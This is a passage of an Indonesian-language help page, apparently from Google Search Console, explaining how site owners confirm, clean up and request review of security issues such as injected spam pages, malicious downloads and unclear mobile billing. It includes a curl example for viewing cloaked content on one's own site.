    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (kompatibel; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Ambil beberapa halaman di situs Anda dan telusuri konten atau link mencurigakan pada respons yang tidak Anda tambahkan. Misalnya, telusuri istilah farmasi atau spam seperti "viagra" atau "mendapatkan uang".

3. Bersihkan situs Anda

Saat sudah siap untuk membersihkan situs, Anda dapat mengganti file yang terpengaruh dengan backup terakhir yang tidak terinfeksi, atau Anda dapat menghapus konten dan link yang berisi spam dari setiap halaman. Pastikan untuk memperbaiki semua contoh peretasan yang ditampilkan pada laporan Masalah Keamanan. Selain itu, telusuri halaman lain di situs Anda yang mungkin diretas menggunakan penelusuran "situs:" di Google dan dengan menelusuri file sumber di situs Anda.

Selain itu:

  • Baca panduan peretasan guna mengetahui alur perbaikan lengkap untuk situs Anda, termasuk langkah-langkah pembersihan dan tips untuk mencegah agar situs Anda tidak diretas kembali.

4. Minta peninjauan

Saat mengonfirmasi bahwa masalah telah diperbaiki di situs Anda, mintalah peninjauan keamanan di laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

Jenis peretasan: Injeksi URL

Peretas telah membuat halaman baru di situs Anda, sering kali berisi kata-kata atau link spam. Terkadang, halaman baru ini berisi kode yang menjalankan hal-hal yang tidak Anda inginkan, seperti mengalihkan pengguna ke situs lain atau melibatkan server web Anda dalam serangan denial of service terhadap situs lain.

1. Pertimbangkan apakah Anda dapat memperbaikinya

Lihat Membentuk tim dukungan untuk mempelajari apa saja yang diperlukan untuk melakukan perbaikan sendiri, atau mengetahui cara menemukan bantuan jika dirasa hal tersebut di luar kemampuan Anda.

2. Konfirmasi masalah

Jangan menggunakan browser untuk melihat langsung halaman yang terinfeksi di situs Anda.

Karena malware sering kali menyebar dengan memanfaatkan kerentanan browser, membuka halaman yang terinfeksi malware di browser dapat merusak komputer Anda. Selain itu, peretas mungkin menyembunyikan konten berisi spam menggunakan teknik penyelubungan agar tidak terdeteksi oleh pemilik situs.

Berikut ini dua metode alternatif untuk melihat konten dengan lebih aman di komputer:

  • Gunakan fitur Inspeksi URL untuk melihat halaman Anda sebagaimana Google melihatnya. Opsi ini berguna karena banyak peretas melakukan perubahan yang hanya terlihat oleh mesin Google. Misalnya, peretas mungkin menambahkan link dari situs Anda ke situsnya yang hanya dirender saat perujuknya adalah Google.
  • Gunakan cURL atau Wget untuk melakukan permintaan HTTP (seperti mengambil halaman) dari command-line. Fitur yang tersedia secara gratis ini berguna dalam mendiagnosis pengalihan, dan dapat menetapkan informasi perujuk atau agen pengguna. Peretas sering menyerang hanya agen pengguna atau perujuk tertentu agar tidak terdeteksi dan memilih target yang lebih baik; sehingga dengan fitur alat ini Anda dapat meniru target. Coba gunakan alamat perujuk lain (seperti link dari situs besar, atau mesin telusur lain) jika permintaan Anda tidak menimbulkan perilaku yang mengandung spam. Misalnya, untuk meniru pengguna yang mengikuti link dari hasil Google Penelusuran ke www.example.com/page.html pada perangkat Windows, Anda akan menggunakan cURL seperti ini:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (kompatibel; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Periksa contoh URL yang tercantum dalam laporan untuk melihat apakah URL tersebut aktif. Anda mungkin belum membuat halaman ini sendiri, jadi Anda harus menghapus halaman di situs Anda, atau menghilangkan kode yang menghasilkan halaman secara otomatis. Baca tentang cara menemukan dan membersihkan halaman ini dari situs Anda.

Anda juga dapat melakukan penelusuran "situs:" untuk menemukan halaman yang belum dibuat.

  • Pada situs kecil, Anda dapat menelusuri [site:example.com] di Google Penelusuran untuk melihat daftar halaman yang telah kami indeks, agar Anda dapat melihat apakah ada halaman yang belum Anda buat.
  • Untuk situs lebih besar, Anda dapat menggunakan kueri yang lebih spesifik, misalnya:

3. Bersihkan situs Anda

Saat sudah siap untuk membersihkan situs, Anda dapat mengganti direktori yang terpengaruh dengan backup terakhir yang tidak terinfeksi atau Anda dapat menghapus halaman yang tidak diinginkan serta file atau fungsi apa pun yang digunakan oleh peretas untuk membuatnya.

Selain itu:

  • Baca panduan peretasan guna mengetahui alur perbaikan lengkap untuk situs Anda, termasuk langkah-langkah pembersihan dan tips untuk mencegah agar situs Anda tidak diretas kembali.

4. Minta peninjauan

Saat mengonfirmasi bahwa masalah telah diperbaiki di situs Anda, mintalah peninjauan keamanan di laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

Download yang tidak umum

Situs Anda menawarkan download yang belum pernah dilihat oleh Google Safe Browsing. Browser Chrome mungkin memperingatkan bahwa download tersebut tidak biasa dan berpotensi membahayakan. Peringatan ini akan hilang secara otomatis jika Google Safe Browsing memverifikasi bahwa file aman.

1. Perbaiki masalah

Temukan dan konfirmasi apakah download Anda sesuai dengan pedoman download. Hapus download apabila ada yang melanggar pedoman ini. Jika tidak melanggar pedoman ini, Anda tidak perlu menghapusnya. Cukup minta peninjauan, seperti yang dijelaskan berikutnya. Perhatikan bahwa contoh URL tidak selalu diberikan untuk masalah ini.

2. Minta peninjauan

Saat selesai menghapus file (atau memverifikasi bahwa download sesuai dengan pedoman), minta peninjauan keamanan dalam laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

Download berbahaya

Situs Anda menawarkan file download yang menurut Google Safe Browsing merupakan malware atau software yang tidak diinginkan. Browser Chrome dapat menampilkan peringatan ketika pengguna mengunjungi situs Anda. Download harus dihapus dari situs Anda agar peringatan hilang.

1. Lakukan evaluasi masalah

Jika download ini disengaja, hapus download tersebut dari situs Anda dan langsung Minta peninjauan.

Jika Anda tidak mengetahui adanya download, situs Anda mungkin telah diretas. Perbaiki masalah peretasan pada situs Anda, lalu cari dan hapus hasil download-nya

2. Pertimbangkan apakah Anda dapat memperbaikinya

Lihat Membentuk tim dukungan untuk mempelajari apa saja yang diperlukan untuk melakukan perbaikan sendiri, atau mengetahui cara menemukan bantuan jika dirasa hal tersebut di luar kemampuan Anda.

3. Konfirmasi masalah

Lihat beberapa contoh halaman di situs Anda untuk mengonfirmasi ada tidaknya download ini.

4. Bersihkan situs Anda

Baca panduan peretasan guna mengetahui alur perbaikan lengkap untuk situs Anda, termasuk langkah-langkah pembersihan dan tips untuk mencegah agar situs Anda tidak diretas kembali. Saat sudah siap untuk membersihkan situs, Anda dapat mengganti file yang terpengaruh dengan backup terakhir yang tidak terinfeksi atau Anda dapat menghapus sendiri konten yang berisi spam. Gunakan software antivirus untuk memindai biner dan konten lain yang dihosting dalam situs Anda. Software antivirus menemukan berbagai jenis malware dan software yang tidak diinginkan, sayangnya belum semua jenis. Mengirim software Anda ke program antivirus (atau layanan konsolidasi antivirus, seperti VirusTotal) akan memberikan indikator potensi masalah dengan software Anda. Google Safe Browsing menerapkan kriterianya sendiri untuk menentukan apakah program atau biner adalah software yang tidak diinginkan atau malware.

5. Konfirmasi perbaikan Anda

Pastikan situs Anda mematuhi Kebijakan Software yang Tidak Diinginkan.

6. Minta peninjauan

Saat mengonfirmasi bahwa masalah telah diperbaiki di situs Anda, mintalah peninjauan keamanan di laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

Link ke download berbahaya

Situs Anda tertaut ke situs yang menawarkan download yang merupakan malware atau software yang tidak diinginkan, menurut Google Safe Browsing. Browser Chrome dapat menampilkan peringatan ketika pengguna mengunjungi situs Anda. Link yang mengarah ke situs berbahaya harus dihapus agar peringatan hilang.

1. Lakukan evaluasi masalah

Jika link ini disengaja, hapus link tersebut dari situs Anda dan langsung Minta peninjauan.

Jika Anda tidak mengetahui adanya link ini, situs Anda mungkin telah diretas.

2. Pertimbangkan apakah Anda dapat memperbaikinya

Lihat Membentuk tim dukungan untuk mempelajari apa saja yang diperlukan untuk melakukan perbaikan sendiri, atau mengetahui cara menemukan bantuan jika dirasa hal tersebut di luar kemampuan Anda.

3. Konfirmasi masalah

 

Lihat beberapa contoh halaman di situs Anda untuk mengonfirmasi ada tidaknya download ini. Dalam beberapa kasus, peretas dapat menyembunyikan link ini jika mereka merasa bahwa Anda adalah pemilik situs. Coba kunjungi sampel URL dengan fitur Inspeksi URL, atau login dengan akun yang berbeda atau di komputer lain.

4. Bersihkan situs Anda

Baca panduan peretasan guna mengetahui alur perbaikan lengkap untuk situs Anda, termasuk langkah-langkah pembersihan dan tips untuk mencegah agar situs Anda tidak diretas kembali. Saat sudah siap untuk membersihkan situs, Anda dapat mengganti file yang terpengaruh dengan backup terakhir yang tidak terinfeksi atau Anda dapat menghapus sendiri konten yang berisi spam.

5. Konfirmasi perbaikan Anda

Pastikan situs Anda mematuhi Kebijakan Software yang Tidak Diinginkan.

6. Minta peninjauan

Saat mengonfirmasi bahwa masalah telah diperbaiki di situs Anda, mintalah peninjauan keamanan di laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

Tagihan seluler yang tidak jelas

Jika Google mendeteksi bahwa situs Anda tidak memberikan informasi yang cukup kepada pengguna tentang biaya seluler, Chrome dapat menampilkan peringatan sebelum pengguna memuat halaman yang mengenakan biaya.

1. Konfirmasi masalah

Kunjungi contoh URL yang tercantum dalam laporan untuk melihat halaman mana yang memiliki perilaku penagihan seluler yang tidak jelas. Tinjau pedoman penagihan seluler di sini.

2. Perbaiki masalah

Perbaiki halaman Anda agar sesuai dengan praktik terbaik penagihan seluler.

3. Minta peninjauan

Saat Anda mengonfirmasi bahwa masalah telah diperbaiki di situs Anda, mintalah peninjauan keamanan dalam laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

Apa perbedaan antara laporan Tindakan Manual dan laporan Masalah Keamanan?

Laporan Tindakan Manual berisi daftar masalah dengan halaman atau situs yang sebagian besar mencoba memanipulasi indeks penelusuran kami, tetapi tidak terlalu berbahaya bagi pengguna. Sebagian besar masalah yang dilaporkan di sini akan membuat halaman atau situs diberi peringkat rendah atau dihilangkan dari hasil penelusuran tanpa indikasi visual apa pun terhadap pengguna.

Laporan Masalah Keamanan mencantumkan indikasi bahwa situs telah diretas atau perilaku di situs yang dapat berpotensi membahayakan pengunjung atau komputer mereka: contoh, serangan phishing, pemasangan perangkat lunak perusak, atau perangkat lunak tak diinginkan di komputer pengguna. Halaman ini dapat muncul dengan label peringatan di hasil penelusuran, atau browser dapat menampilkan halaman peringatan interstisial saat pengguna mencoba mengunjunginya.

Apakah ini membantu?
Bagaimana cara meningkatkannya?